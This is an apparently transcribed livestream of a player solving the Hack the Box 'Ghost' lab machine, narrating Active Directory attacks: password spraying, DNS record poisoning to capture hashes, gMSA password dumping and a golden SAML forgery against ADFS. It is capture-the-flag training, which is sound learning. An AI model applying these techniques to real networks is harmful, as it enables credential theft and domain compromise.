Yo! Jolteon with the Prime sub. And he redeemed VIP. Holy shit. Alright. Let me VIP you. And then we gotta increase the price. W Jolteon. What up, BX? What up, ESCS? What up, Chandu? Bam. VIP. Okay, how do I gotta increase this shit. Channel points. Edit VIP. That will now be 100,000. All right. Well, now we're doing 100,000, and it increases 100,000 every time. Bam. Been lurking a long time for that. Yo, wait. You have 6 months. You got the platinum root badge. How long does it take to finish one CTF? Depends on the difficulty, my friend. Depends on the difficulty. Last stream, we started an insane machine. Ghost. This is the hardest category on Hack the Box. So, it's going to take us 2 streams. We basically got halfway with the first stream on Wednesday. Do I know what to do with PFX files? Yes. You can use them for authentication. They're certificates. You can use them for authentication. So I'm not in TMUX. You can actually do certify auth, certify AD, auth, and then you can do -pfx or pfx file, put the IP, and you can actually authenticate whatever. You can authenticate with the pfx file. Actually, I think that'll... Yeah, and then that'll dump the NTLM hash. You can use pass the hash. I think that's what that does. How many you get per stream? How many what do I get? Bone poo. Nice, nice. I've heard of that one. It sucks because I can't, I can only stream the free pro labs. I've done Zephyr. This was a good one. I enjoyed this one. I can only do the free ones, so that's either Full House or Solar. And I don't know. I haven't heard great things from them, but I don't know. Maybe one day we'll do it. I don't know. If I'm in the mood. Flags? Again, it depends on the difficulty. I can get a flag every half hour if I'm just doing like really easy boxes. Not doing insane box, it's gonna take me a whole stream to get one flag. Alright, this does take a while to spawn, because there's a lot on this machine. Alright, so we left off... We got creds. I think we left off with these creds. And we were using that... We were looking at the, this. Once we get our IP address. This is the boring part. I should have done what do you call it? The gamble thing, the prediction on how long this will take with channel points. Oh, it's up. Okay. I am not on the VPN. Let's go back. Open VPN. Nope. VPNs. Black. MZ, what's up? No, we just got here. Just started. Back at it. Alright, we can ping it. Let's go modify our host file to update that IP address. Is it DB? Alright, now I should be able to refresh Say this. We should be good. Nice. Okay, let's try these. Actually, we already know the creds for these. The way we got access to this initially was through LDAP injection. I don't think this is the cred for this part. How am I using VirtualBox? No, I'm using VMware. Okay, I think we left off here. I was reading this. I checked back on my stream to look at where we left off, and I got an idea. Because I remember there was another account on GitT, and I wanted to see what that account was, and if we have creds to that account. Anyways, I think we were left off reading this, because we never encountered Bitbucket. And we tried to hit this IP address on, I think, both machines. One of the machines we didn't even have like any binary to networking tools. We got a foothold. Yes, we do have a foothold. We could get a shell right now. It's on the there's 2 boxes on this, I guess you could say. We need to spin up BloodHound as well. There's a Linux workstation and the domain controller. We have a shell on the Linux workstation. Bunny, Omer, what's up? Nick, how we all doing? I have a script that checks the pipeline results, and that's from Justin Bradley. Okay, let's go back to GitT. Forget the host name. Is it just this, but GitT? I'll get a BloodHound. Oops. I think it was just Git. Fuck, I keep doing Control W because that's how it is to delete a word in the command line. Let's Control backspace here. I think it was GitT here? Yeah, it was. Okay. So we had... Oh, I forget what creds it was. Fuck. Let's try... fuck, dude. Wait, can we explore users? We can. Okay, we had GitT temp principal. That's how we logged into here. We have these creds. But there was another account here. Viking, what's up? Mind Asterisk, what's up? Cassandra Shelton is another user here, which we haven't tried creds for. I really should have taken note on all the passwords, because this isn't extensive. I remember we had more creds here. Probably should have taken better notes, but it is what it is. We can always go back. I'm gonna try. I guess we'll try these. No, this was intranet principal's password for I remember, for the other thing, for this. Because Aaron was the one who was committing the codes. Gotcha. Do I have any pet projects or something on GitHub? Not at the moment. Nothing posted to GitHub at the moment. I have a tool that I was working on. I kind of stopped, but I'd like to get back to it. Maybe if we finish this, I can continue working on that. Because there might be some private repos that Cassandra has that we haven't seen as the Git temp principal account. But these were all the passwords we had. There's more though. Okay, let's go back to get a shell and stuff. This was our... Let's open up Burp Suite. This is what we used to get a shell. Hopefully the API key doesn't change in that standard on reboot. So 8081, we have BloodHound running on 8080. I don't even need to proxy at the moment. I just want to send this request. Send this. Oh, we gotta listen. 80. Put that here. Cool. Send. Nice, that worked. What are my thoughts on WSL being open source? I don't care. I think open source is generally good. I'm pro open source. So, I think the more open source there is, the better. Hyper with the follow. Thank you. And then we had, where was it? It's in home? It's in root? No, we are in root. Slash home? Where? How did we pivot? I swear there was an SSH thing here. Wasn't there like a dot, some SSH, what was it called? Some like weird shit? Am I tweaking? I could have sworn. This is the one where we found the KRB cache? Well, then how did we get on that Linux workstation? No, there's nothing here. Like, is the box just, like, what? There's nothing here. Am I tweaking? Yeah, here we go. This is the control master thing. Oh, did I just not view hidden files? I may have not. Where am I? Yeah, I'm in slash root. I thought I viewed hidden files here. I guess not. Okay, never mind. I'm just tweaking. Control master was the pivot path. So we do this. We do like SSH this. Cool. All right, now we're on the workstation. What did I want to do here? Oh yeah, there was an. I was on the other one. Okay, let's exit. And then ENV. Okay, so here we had creds. There's a JWT secret, which I doubt will be. Let's just add these all to. Let's just add this all to creds. That's not creds. Let's just add these all here. So JWT secret. All the juicy stuff in case they're reused. We'll take both these. And I think that's all there. How do we get this password? Oh, that's the LDAP-bind one. Okay. Okay, I think that's it. How do I open U of M in a small window? This is tmux. I'm using tmux to split terminal panes. And then I'm just opening U of M in the bottom pane. Huh. That was in our users, right, Cassandra? Yeah, we did. We sprayed. I don't think we sprayed all these passwords. I guess we might as well at this point. Let's just spray all of them. Okay, let's just make a list of passwords as well. So let's echo this to passwords. And this. And this. And where'd we get this? Oh yeah, this was the internet principal password. Wait a second. Now these are all just random pass keys for this, right? No one's. It's possible they do reuse it though, right? It's a secret. One contains letters and numbers. I don't think that's going to be reused as passwords, because we could technically get all these users' secrets for this web app, but I doubt it. All right, let's do SMB. Let's do users, and then passwords, And then let's rep out negative results. And that's all we get. That's what we have. Kind of expected. Yeah, okay. That's expected. So Justin, he has a script that checks the pipeline results and works in GitT. Justin must have a GitT account, but then it doesn't show here. Maybe his account's privated? Is that a thing? Is a BloodHound angle? What do you mean? Let's sign back in with... Fuck, do we even have the GitT password? We must, right? I think this was it, right? That's the GitT password for where's the GitT tank principal? Oops. What? That's not right? I could have sworn that was it. Does that change randomly? Fuck, that one might change randomly each time then. Run BloodHound Python against the DC, no. Well, we've done that. We've done that. We did that Wednesday. Internet principal doesn't have anything useful. And we also have a valid ticket for Florence Ramirez, but he doesn't have anything either. These accounts are relatively useless. It is part of the principal's account, which can connect to MS SQL. Or the principal's group, this custom group, which they've given MS SQL connection to. Actually, maybe that's just for all users. I think that was for all users that they can connect. So that was, never mind. I don't think that's anything useful about this specific. I think that's just all domain users. So scratch that. Let's go way back. What up, Nivalata? I fear the password for GitT is random on startup. So we're gonna have to brute force that again. But luckily for us, we made a script to do that. Using OpenVPN to connect to the machine? Yes. Where did we make that script? Brute.py, this thing. Lovely script here. And I don't even think we need to change anything. Oh, we do need to change this. Let's just remove this. Because this is now empty. This was our start that we started with before we made the script. Nothing in MS SQL? Yeah, nothing. And I checked like all the, the privileged stuff you do. XP dirt tree. We did have access to XP dirt tree. No XP CMD shell. XP dirt and no impersonation as well. XP dirt tree, when we captured the hash for that, we got the machine account N2MV2 hash, which is basically uncrackable. There might be a situation where we can relay that to LDAP, because I don't think LDAP signing's enabled. So there might be some path there, but that would just give us straight root, and we'd skip user flag. So I don't think that's the intended route. Could be fun to just do afterwards. Alright, we're running brute.py. And it doesn't... Oh, you know why? It's because our proxy is now on 8081. I don't know if that might be the problem. Is that it? Yeah, that was it. Okay, SC, SCR. Yeah, this is... Did it change? No, it didn't change. And there was something after it, right? It was like an F. I don't know why I didn't get printed, though. Yeah, it's an F after it. That didn't change. Do we not have that in creds? We do have that in creds. Does it just have to be lowercase? I don't know. That's kind of weird. Okay, now we're signed in. Huh. I'm thinking of relay hash back to the same machine. I may be wrong, though. I think you can. I don't know. I've done it before on some other box. In some weird way. Okay, so this is... Yeah, Cassandra did make these. And that's just the Ghost Dev organization with which we have access to. Gotcha. So we could try and access that. Other account. Cassandra. What is that? Cassandra Shelton. I want you. What are you a part of? Sysadmin group. Inbound is nothing special. Pretty standard. So I'm gonna have to get her password somehow. Unless for some reason her secret key is also the same for this. Domain logins to Git have been disabled. You can only log in with this account. That's what it says. But there is another account on here. And its corresponding internet token as a password. We can't post a password here for security reasons. Let's just try... Let's try dumping Cassandra's internet token. And then see if that works as her password. Where was the user? It'd be in the data here. Here we go. Held up username. Cassandra Shelton. I wonder why it doesn't print the last value. It's fine though, I'm not gonna worry about that. You can easily just view it. Burp. XCR, okay. But this should work without the asterisks now. And it does. Okay. So that's her password. For this. So let's try it for here. Cassandra Shelton. Let me just this into town. I didn't need to do that, I could have just done this. I just wanted to have it for copy paste purposes. Temporarily. So I could copy this. Alright, try this as password. Nah, didn't work. Fuck. Damn. That sucks. Try to connect to Bitbucket, but it doesn't work. I need to do why. I have a script that checks the pipeline results. And it works in Git. Tried adapting it to Bitbucket, and it works locally, but I can't test it on our servers. I mean, maybe those private users. I guess I should test SJ with the follow. I guess I should test all these, right? This one was this. No. We don't have internet. Alright, let's just do internet. Actually, I guess we could try this first. Probably not. Yeah, let's try the brute thing for internet. Internet principle. Here's the password. Doesn't work. Yeah, I didn't think there'd be like hidden users. Huh. I have a script that checks the pipeline results and it works in Git. Try adapting it to Bitbucket, and it works locally, but I can't test it on our servers. Just finished my bachelor's in cybersecurity. Now I'm grinding Hack the Box and Track Me, because my latest decline of application mentioned they frequently use Hack the Box to track new profiles. Yep. And I found you. Been watching you for like 15 minutes, and already find you interesting. Hell yeah, dude. That's great to hear. You're in the right spot. Except, today we're doing an insane machine. You could definitely go back in my VODs on YouTube live to see like the easier machines I've done in the past. But I'm sure you'll get something out of this at least. But feel free to ask questions. This is the second stream of doing this box, so we are halfway through it already. I'm just trying to understand this. So is Bitbucket running? Bitbucket's got to be running on 70%, maybe even 80%. Okay. Well, that's what I hate. That's what I do. I don't like. I wish these were 50-50. User flag and root flag is. It is typically like 75 is user flag. That's typically how it is for like all boxes. 70%, 75% is just user flag. I really wish it was. Sometimes you do get 50-50, especially with like, I guess the assumed breached ones. But I wish it was more 50-50. Doing hands-on sets you back to 1 year. To year 1. Yeah, it does. But it's valuable. Because that's what you're going to be doing. If like employers are looking for this, because this proves that it's what you're going to be doing. You're going to be doing a pen testing job, you're going to be doing exactly this. Like the exact same thing. It's not going to be multiple choice for clients. You're going to be actually pen testing their networks, web apps, whatever. So this is a great way to prove that you know what you're doing. This one's rough though. I try to connect to the DNS. Okay, yeah, DNS entry's not configured. Keep running the script. Huh. So I guess that's only internally it's running. It's not gonna be on the workstation, is it? And I can't use any tools. There's no tools on this. On this container. I suppose I could. That's just dude. Okay, list. No, I know there is a valid. We've already dumped this. We've already extracted this. I know we have a valid ticket. Did I pay for OCP Plus myself, or yes, I did. It is a hefty price. Do not go for that off the start. That was a bad decision. I took the exam. I had to take the exam 3 times, and I bought a lab extension. So a lot of fucking money, which I could have saved if I were to just be patient and build some more skills up first. It is entry level, but even entry level is hard in this field. So if you're brand new, take your time, go for some easier certs. Start with Hackdogs Academy, only $8 a month. Yes. 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 Completely agree. Hackdogs Academy is much price friendly, especially the student subscription. The student subscription is great. It's $8 a month. You get access to basically everything. Like, I don't think this helps us at all. Okay, we wanted to do... Okay, I wanted to get this dude's password, right? Because we have this valid ticket. I doubt that still works, though, because we rebooted the machine, but it is possible that this still works, actually. Lawrence Ramirez. And then dash K. Yeah, here we go. Does this still work? Export. Here we go. Expired. Okay, yeah, that checks out. All right, let's extract this again, just so we can get another valid ticket. Let's just basic C4 encode this. And then decode it. Basic C4-D. Wrap there. And then that'll be our new file. Now that should work. Nice. Okay. So we tried Ccache to John to see if we could somehow brute force the password of this account, but I think this failed. I don't know if it was John that failed or yeah. It could just be that we can't crack this. When I did it to John, I messed up. No, I didn't. This is how it is. This is how you would do it. Nothing in shares? No, nothing in shares. SJ with the tier 1. Much appreciated. What up, Tosu? Can I get anything from the text of any of the web apps? Well, we get some context. I mean, the first stream was owning a lot of these web apps, and getting access to them all, which we do now, except for, I mean, we'll have full control over GitT. I just like access to this account, but we're gonna need their password. Try to get into Bitbucket, but it doesn't work. Any idea why? A script that checks the pipeline results. We don't know, like, what pipeline. Just anything. Wait a second. What are they talking about when they say the pipeline? Are they checking if this DNS exists? Because if so, then we can do like DNS spoofing and we can get like a lot of shit after. Is that what they're hinting at? Like spoofing this DNS toast name and then capturing. I don't know, man. It says DNS isn't configured there. Yeah, for this entry for this specific subdomain. Hi Peppa, what main tools for working with Active Directory can you name? That is, I could use almost every Windows machine. What do you mean that you can use in almost every Windows machine? You mean tools that are specifically run on Windows? You mean, I mean, Active Directory doesn't just have to be Windows machines as well. If you're just talking about Active Directory, BloodHound, Impacted Suite, NetExec, Certify. That's really the main ones you need for Active Directory. Bloody AD is nice as well. Yes, I'm on VMware. What just happened? Kali Linux announcement? Oh, Kali 2025.2 released. Kali menu refresh, Bloodhound Community Edition, and Arsenal. What's Carsenal? What is Carsenal? No, I want Carsenal. Car hacking tools. Cool. Those are United. Yeah. Okay, so if someone's like continuously trying to reach this, I guess we spoof it. Gosh, what did I use earlier to do something like this? There was some like DNS relay thing I did on another box. It's not gonna be here. It's not gonna be here. DNS spoofing. Yeah, it could be something like that. I don't want that though. No, that's no good. This is no good. Okay. Bloody AD can spoof, can it? That's awesome. I didn't know that. They have a wiki that's just great for everything. Bloody AD. You go Bloody AD. Go to the wiki tab. Bam. This is great. Then we go access control. You just search for spoof. DNS. Oh, it's only searching for. I don't know. Maybe not. ADI DNS spoofing. Check that. Get all DNS records. Check these. Don't need selection. Check this. Get. It's under add. Like adding a DNS record. Yeah. Where I've done that before. I think I actually did that with Bloody AD. I need to add that to my notes. Is it spoofing? It may not be spoofing. It may not be even spoofing. It may not. It may just be adding the record to the. Yeah, it might be explicitly that. Okay, maybe this wiki isn't as helpful as I thought it would be. I can just do add help. Is it help add? No. Okay. Add DNS record. Oh, we do have creds. HD. Ghost.hackbox. Ah, fucker. Gosh darn exclamation point. Bam. I missed the H. Bam. I removed dash D. Bam. What? Oh, I have to put those before? Add. I hate that positional shit with BloodHound. Okay. Name data. Do we do just the subdomain? I'm assuming the full thing. And then the data, so our IP address. 10.10.14.137. Well, that's not good. The fuck? Can you DC host? I will do the IP, why not? Ztosu with the follow. Thank you, thank you. It's conditional. Okay. Add operation failed. Insufficient access rights. Okay. Well, that didn't work. We can't directly add a record. But we still might be able to spoof. We can also try our -K, -U. What was it? This guy. We could try for communities. I doubt that'll work though. Worth a shot. Server not found. That's because we have to use a host name. DC host. Used to host. Dash host. to1.ghost.hackbox. Oh! Wow, that worked with this user. Holy shit. Why did this user have access to it? This is part of IT group. That makes sense. He's part of the IT group. Okay. So now we are essentially this. So we just run responder now? And just wait? See if we get something? We could try relays as well. But we should just be capturing v2 hashes if it's working and they're trying to access. We don't have HTTP server on. That's something we might want on. Not sure why that's not on. Set our it's under responder conf. Let's turn HTTP on and restart this. There we go. Alright, I guess we'll let this just sit for a while and see if we catch anything. We could also just open Wireshark and just see all traffic running through ton 0. That might not be a bad idea. Was there even RE on Infiltrator? I don't remember. Ton 0. We're just listening. The intended path has reverse engineering. Maybe I didn't do the intended path. I don't know. Maybe I did. I don't remember it, honestly. I may have done it. They've tightened it up several times. Okay. I did do it, I think, when it first released, so I may have done an unintended route. Alright, we're not getting anything. Damn. I thought that would... Surely this is intended, though. But we are not getting any traffic. Big sad there. What else is in the container? Nothing. Literally nothing's in the container. Basically nothing. There's a binary that runs the application. There is the environment variables associated with it, which we've dumped all the secrets from. And then there was that lateral movement thing to the workstation. And the only thing on the workstation was the ticket. Kind of confused, to be honest, since I remember that actually being it. Well... They patched it last week, so making one final push to get it before it's retired. Good luck, Cypher. You got this. Well, is there something wrong in... I mean, no. It doesn't have anything to do with the responder, right? Because we'd still see it in Wireshark. That was probably just me closing the connections, right? Yeah. That's nothing. We'd still see the traffic coming through in Wireshark, right? To us, at least. If his... Unless... We gotta do it again. No, it already exists. Attribute if it exists. It does exist. Whoops, that was me doing that. Welp. Okay, maybe I shouldn't have done that. Can I clear this? Did we correct the host or domain? Supposedly we did it all correct. Let's go back. And yeah, I mean that's the correct host name. And domain. I assume that'd be it. I mean I can also just do this. Okay, just do the subdomain, I guess. Do this. Let's restart this. What was that? There we go. Okay, I think I just had to do the host name. Just Bitbucket, and not the fully qualified distinguished name. Which is bitbucket.ghost.hackthebox. It was just the subdomain. VGB, dude. With 5 gifted subs. To AJ, IFR, BX, Nemo, and ECS. WVGB. Yo, why do you guys not have, like, regular names? I mean, Nemo. Nemo's, like, an actual name. But the rest of y'all are just, like, letters and numbers. Whatever, man. Vandal does. Yes, I know. But, like, it's just funny. WVGB47. With the 5 gifted. I really appreciate that, man. Thank you again. Neva's normal. I know. But it was just, like, within that entire... The entire feed. Of gifted subs. Okay. So that worked. Justin Bradley. W. You dirty dog. Nivolata with 5 gifted. Yo. Yo. You guys can't be real. W Nivolata. W's in the chat for VGB and Nivolata. With 5 gifted subs. To Kurai, RCM, Fishbone, Aguni, and Isivanov. Now go get that read. Yo, W Nivolata, W VGB. I appreciate y'all a lot. Okay, let's see if this cracks. What? Yo! Wait, VGB wasn't even subbed? Are you kidding me? Cypher Enigma with the 5 gifted to D-Real, Anton, VGB, Tiny, and Vandal. What? W Cypher Enigma. Damn. Cypher, Neva, and VGB with 5 gifted subs. New hype train record. We were 2% off, had to. W Cypher. Oh my god, y'all are crazy. Y'all making me smile and shit. We gotta get this box done. And it did. The keyboard walk. Two creds. Alright, we got new creds here. Justin's owned. And I think, wait, this is the dude that had GMSA, right? Yes, it was. Okay, awesome. Now we can do netexec. Let's just go back here. Do netexec. I can kill this. Netexec. Dash U. I gotta get that creds in. Cat creds. Okay. Netexec. Dash U. Justin Bradley. Do this. Bam. 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 And then dash GMSA. They might have to be under LDAP. Yeah, I think it's under LDAP. Oopsies. Huh? Error in search request. Error getting GMSA passwords. Really? Okay, that's fine. I'll use GMSA dumper. For anyone unaware, GMSA is group managed service accounts. And this, it's an access control entry. Allows us to read the password for the GMSA. Doesn't work with netexec. I think there's an in-packet one for this. Maybe not. Is it this one? The GMSA? No. Maybe there's not. I have GMSA dumper. GMSA dumper.py. Okay, I do have that. A password. And we are on go.hackerbox. And we are buffering. Okay, there we go. That worked. Why did... Huh. I wonder why netexec failed. Okay. This is why we have different tools. That's fine. Now we have this. Wait, which one's the NTLM hash? We'll try the first one. Oh no, this is different. These are different. I assume this is it. Let's just double check. Let's go -H for GMSA account. And we're good. Let's gobbledygook there. Yeah, okay, that's the right one. Let's add these two creeds. Okay, now we own this. Yeah, just owned as well, just for fun. All right, ADFS. Oh, now we're on the last part, aren't we? Wow, this hasn't even taken us an hour, and we're basically done. I think this is the last step. All right, we have WinRM here. Part of remote management, so we can WinRM into this. That was the wrong hash. Is this user? This is not user. Huh. Oh, Justin Bradley, does he have? I didn't even check. Does he have WinRM as well? Oh, he does. Okay, that was user. Okay, that's fine. Let's get the flag. Why don't we? Let's get the flag. Yep, there it is. Free code with the follow. Sweet. Okay. So then last step, I think, is the thing we researched at the very start of this box when we came across whatever it was. This thing. Oh, you have to use burp for this for some reason because the cert isn't trusted. So the very first thing we came across at this box, came across this ADFS service. Today chat's live. What up, Kyber? Chat is alive. So I assume we just use our ADFS account for the exploitation. Exploiting ADFS. I don't think it was relaying. We already tried stuff like that. I think it was this. A golden SAML attack is what we wanted to look at. Because this required creds. I remember that. We were doing this like off the bat, and we didn't have creds, so like the only thing we could think of was like relay attacks, something like that. But now we have creds, so I think we might be able to do something like this. ADFS dump. To extract cryptographic pieces. Execute .NET on the host with ADFS service. Okay. So we can run this. I assume we are running. This is the ADFS account, so I'd assume that would be running ADFS. So if that's the case, then we're all good. You've done this box before, correct? No, you've not. Well, we started it on Wednesday. We started it on Wednesday. We are wrapping it up today. This is that. Alright, let's just download this tool, ADFS dump. It's not compiled. These motherfuckers. Are you kidding me? Please tell me it's on, It's not. Gosh darn it. Do I have to compile this on my host? Really? Isn't the Ghost pack compiled? Is it? I'd hope. Ghost pack. This is the one with like all the .NET. Yeah, this thing. It would have shown up if it was. Oh, it might be on this one. This other guy. Hold on. Let me go to this other guy. Langvik, Sharp Collection. Jacob Fried has it? Okay. Let's just do, I guess we'll do 4.0 in any. ADFS dump, there it is. Still on that. Move, home downloads, ADFS dump. Put that in www. And WinRM here. And then upload that. On that. No output. That's probably not good. Oh, it did run. This is good. Maybe. Relaying. Party trust information from database. Are there creds here? Certificate values. I closed the article. I want to read. I need to continue reading the article. Oh, where'd it go? Here we go. This one. Okay. ADFS dumps extracts useful information about relaying parties. This allows the attacker to know what information needs to be included in the spoofed message. The following includes screenshots. Show 3 trust relationships. Microsoft SAML, Office 365. Alright, what are we dealing with? Don't know. We don't know. Reading relay third party trust information from database. Oh, this is just the host name. Okay. Okay. Obviously, it wouldn't be something cloud-based. For the Hack-to-Box machine. It wouldn't be like an actual Office 365 login. ADFS uses claim-based authentication, and the access policy parameters are essential for how ADFS works. These are rules that are used to transform identity provider fields into specific representations that the relaying party understands. Armed with this information, the attacker can now proceed to generate spoofed response when they wish to gain access to a specific application that the user has access to. Identifying which user has access to which applications is not obvious and depends on the scheme used by the system administrators. Some group users by role and access. Assigning these, yada yada yada. Okay, I don't care about that. Attacker can use a web application tool, Burp Suite, to assist in fooling the targeted service. Brup Suite? What is Brup Suite? Yo, chat, what's Brup Suite? Brup Suite is a person in the middle tool. I didn't know that. This allows the attacker to modify these messages. With this, the attacker is now in the position to initiate the attack. Okay. So we supply an email address, assuming the administrator, I guess. At this point, we go to ADFS. Bruh Suite. The attacker can use the information they stole to generate the appropriate WS Fed response, sign it with the token signing certificate, and send it back. The spoofed response is... Should we just copy paste this into the request? All right, let's open Burp and let's capture the request. Oops. Where were we? Here. Administrator at ghost.activex. Password Dookie. Okay, so it's this. No, we spoof the response. Hold on. They're okay, so they're using intercept and they're intercepting the response. Weird. It's really hard to read the screenshot. Chat, this is so bad. How do I use this key? It's so hard to read. We need, like, I need like a sample format for the WS Fed response. Can I just do like a golden ADFS golden SAML? I want to look at some other guide. Building forge security token. Oh, they're doing all this manually. Golden SAML attacked. Compromise ADFS. We've done that. Extract required information. All right, we've done that. All right, this is a great article. I love this. We use ADFS dump. Next, the adversary needs to convert the information into a format. Okay. Okay, let's do this. TSX key. Which one? Okay, if his name starts with a B, then yes. Just text me, dude. Just text me. Yeah, if his name starts with a B, then yeah, I'm going. Yeah, I'm going. Token signing key. Alright, this is what we want. Do you know if LK is coming? No, I do not. We don't let's echo this. Why are there new lines in between it? What do they call it? TKS. Let's do that. Fine, I'll do this then. Yes. 64. Convert DKM key to DKM key.bin. Where's the DKM key? The posture check is crazy. DKM needs to be converted to hex. Oh, it's these. Why is there two? Later. Why are there two? Fuck it, we'll try the first one. TR-D. Okay, that deletes that. And then this reads the hex dump. Well, that's that. Okay. Into dmkey.bin. Okay. Now we have both these. Then we forge the golden SAML. We have all the necessary details to forge the SAML token. This example uses ADFS spoof to create golden SAML. Alright, we're ready to download that. Let's just download the entire repository. Okay. Hojo with the follow. Alright, this should be it. Should be... Oh, we don't have a pkey.bin. What is pkey? The fuck? Are they... Maybe just a DKM key? Oh, that's kind of weird. The object GUID. Which one do we use for that? Which object? The GMSA account? Of the user to create token for. So the administrator, if we're going to do that. We shouldn't need to do these. Oh, this is kind of weird. Let's just do it one by one. See what happens. Server. It's on a weird port as well, isn't it? No, it's not. It's on 443. Huh? Oh, they type it again. Bit 3 install requirements. Probably should do a virtual environment. That's wrong. Yep, we're cooked. Okay. Python 3. Then. Source. Then bin. Wait. Right. Reinstall this. Electro to follow. Fuck. Oh, that's not good. No module named cryptography. No module named 6? That's a thing? Oh, fuck. Gosh darn it. I hate dependencies. Just give me a binary or something, dude. Come on. These guys specifically use Python 3.6. I don't know if that matters. It shouldn't. I don't even have that installed. Shouldn't matter. It is a 6-year-old tool. That is true. Maybe I should look for just an updated one. I don't know. Maybe one that can just automate the whole thing. Oh, we were looking at this one, but this one failed as well. Because the tools are just older. 8 years ago. This is even worse. Golly. Let's try it. It's only one file. It's 3, actually. Did I use the requirements file? Yes, I did. I did. Pip install -r requirements. Failed. I don't fucking know why, but it did. I'm not going to worry about it. Let's just do a different tool. Schmidt. Oh, Python 2. Good. Good. Okay, this is even worse. This is 8 years old. Did I pwn Titanic? I think so. What the fuck is this crap? Well, at least they gave me a command to install everything. Never mind. Why is it using Python 3? 2. Why is it using Python 3? Verify requires a different Python. Alright, can I just do... I don't know if I can do 2 to 3 on this. I can try it. 2 to 3. Is that it? Yeah, I think that's it. Schmidt. Nope, that didn't work. Unless it did. Nope, it failed. Okay. Gosh, why are these tools so old? Alright, maybe I'll just go back to ADFS spoof. I don't know, man. It's getting rough. try this. Downgrade the cryptographic library. Fuck it. I don't want to run these with sudo. We gotta downgrade. Because it's so old. Okay, we're getting there. We're there again? We just fixed this problem. Oh! Okay, it's working now. Okay, it's working now. DKM? It's dot slash now. And then dot slash here. Why am I in insert mode? TKS. Alright, we're getting somewhere. We got the tool to work now. MAC did not match anticipated MAC. Where are you getting a MAC address from? Dog. Like, what? Where are you getting a MAC address from, brother? Try to do dump? No? Unless I decoded these wrong. Or like, converted them wrong. Generate a token for some app. We want... Wait, this is the pfx.bin. Is that what we wanted? We have the TK... This is different. Maybe it's not. You just basics before I put it. You know what? Let's go back to... let's go basics for... Where was I with this back? W0? Is that why? Oh no, dude, what? What's wrong with this? Why are you... Burp, go away. Wireshark, you're done. Why are my tabs doing this all of a sudden? Maybe it was a different DKM key. Maybe that wasn't the right DKM key. Because there was two we saw. Oh, no, it's here. There's this one as well. Maybe we needed this one. Nope, still doesn't work. Oh, we're here now, actually. Well, now we're not getting that error message. In here. Okay. We're just getting nothing now. I don't know if that's better or worse. Dash path. Test. Oh. Okay, that worked. We have something. We got something for output. The token? It's not plain text. Decrypt encrypted PFX and write to disk. I don't know if we wanted to do that. Decrypt the blob and output it. Okay, maybe we didn't want to do that. Server. Federation. Search file directory templates none. What? Oh, I have to set a name. SAML 2? Because we're not using... What are these? Let's just read this. What does it look like? Is that what we're using? SAML 2? Yeah, we are. Okay, sweet. We'll use that. If not using a config file, you must specify all other config SAML2 args. Okay, what are the other arguments? Where's SAML2? SAML2. Endpoint, the recipient of the security token. It should be a full URL. And you spelled security wrong. Like, what is it with the typos today? With the specific ADFS vulnerability, everyone's typoing. What the fuck does this even look like? Endpoint, the recipient of the security token. This should be a full URL. No, translating would spell it right at least. The recipient of the security token. You're too broad. Do you just want the URL of my fang? I think you want this. I think you want this. Is this what you want? You want this. I'm gonna say you want this. Endpoint. How many of these do I need? Name, ID, format. The value of format attribute of the name identifier tag. Huh? Huh? Name identifier tag. Oh, it's all here. Nice. Sign in. Oh, it's all here. It's all here. I just didn't read. Well, it's not that I didn't read. It wasn't clear, okay? It wasn't clear. The documentation's fault. It wasn't clear. It wasn't clear. It's not my fault. That's not the right one. That's just name ID. Need the format. The format. What do you mean format? The value for the format attribute. You can also decode the message from burp. Format? Huh? Decode the message from burp. Like from when we authenticated with valid creds? Let me just do the whole signing process again, I guess. Yeah, just with any creds. I got you. Just to capture the authentication mechanism. See what that looks like. Bam, at Ghost. Gotta hack the box. Bada bang, bada boom. Okay, there we go. Here's our requests. There's a bunch of random shit here. Do I need to code the cookies? Is that what? Like how would I even see that? Where does it say that? Oh, here's the SAML response. Okay. Okay, there it is. And that's in base 64. They still don't tell me the format. Where was I? Here. Name format ID. The value of the format attribute of the name identifier tag. We don't even have that tag. At least here. Am I tweaking? Oh, we didn't copy the whole thing. We didn't decode the whole thing. Oh, fuck you. Let me just copy this. Burp doing it better. And then output. Wait, let me just do move output output.xml open output.xml. There we go. This is much easier to read. Okay. So again, we want the format attribute of the name identifier tag. There's no name identifier tag. What's going on? We're doing Ghost on Hack the Box. We're exploiting a vulnerability called ADFS golden SAML. This tag doesn't even exist. ADFS format attribute. The value of the format attribute of the name identifier tag. Name identifier. How did this get the identifier? Like, what are even the options? I could just guess the format if I wanted. Alright, what else do we need? Identifier of the relaying party that is receiving the token. That's this. Oh, man. Oh, this is the issuer identifier. This is the identifier. And then the other one is the recipient. Where am I? So this is the name ID. And then the recipient one. Or no, that was for identifier. Fuck. Wait, what? Okay, I think I'm doing it right. And then this is for the recipient. Assertions. The assertions that the relaying party is expecting. Use the claim rules output by ADFS dump to ascertain this. This should be a single line. Do not include new lines XML string. The assertions. Buddy, the word assertion doesn't even show up. Like, dude, be more specific, my friend. I'm assuming it's this, but I don't know, man. Could be this. Oh, here, I can see an example here. I didn't read it. I didn't see this. Huh? Why? Is there a wiki page? No, there's not. This is so bad. Why are there no better tools for this? There's a URN on the XML file. Which one? Mine that I got? Oh, there is. Thank you. That is for the name ID format. Cool. I have that up here anyways. There's other URNs as well though. Which one do we want? Like, I don't know. There's just so many. The format attribute of the name identifier tag, which there is none. Okay, I think it's this. I think it's this. We have that there. No, this should be the recipient. This should be this. That should be there. Right? And then... what is it? This is the recipient. No. Oh gosh, let me go way down. By request number. Post response. That's the recipient. I don't know if that's recipient identifier though. That's definitely the endpoint. And then the name, format ID, sure. Name ID. Name identifier. Yeah, that doesn't exist either, but I'm gonna hope that's fine. Assertions. The assertions and assertions. Use the claim rules output. There should be a single line XML strings. Okay, I'm just gonna try random XML from the output. Like this one. This is the only XML. Besides this, the access policy. It might be that, I don't know. Looks like it could be. Let's just try it. Looks like it could be something with this down here as well, though. That's not XML. Where'd I go? Uh-oh. I'm on the wrong page. No, I'm not. I'm lost. There we go. Alright, let's try it. Dash assertions. Bam. Yep. Figured. That didn't work. And then this error message is just awful and doesn't tell me shit. XML syntax error. Where? Where is your syntax error, my friend? Okay, policy statement and attribute. Okay. Policy metadata. That's not right. It wants attribute. I don't know, man. This is buns. This is some buns. Oh, here's assertion shit. Does it want this entire thing? Does it want all of this? I know it said it didn't want new lines. Might need to remove all new lines. What just happened? Oh my gosh. Assertion name. Attribute name. Attribute name, attribute value, attribute. Does it only want the stuff that starts with the word attribute? Like this? Attribute statement? 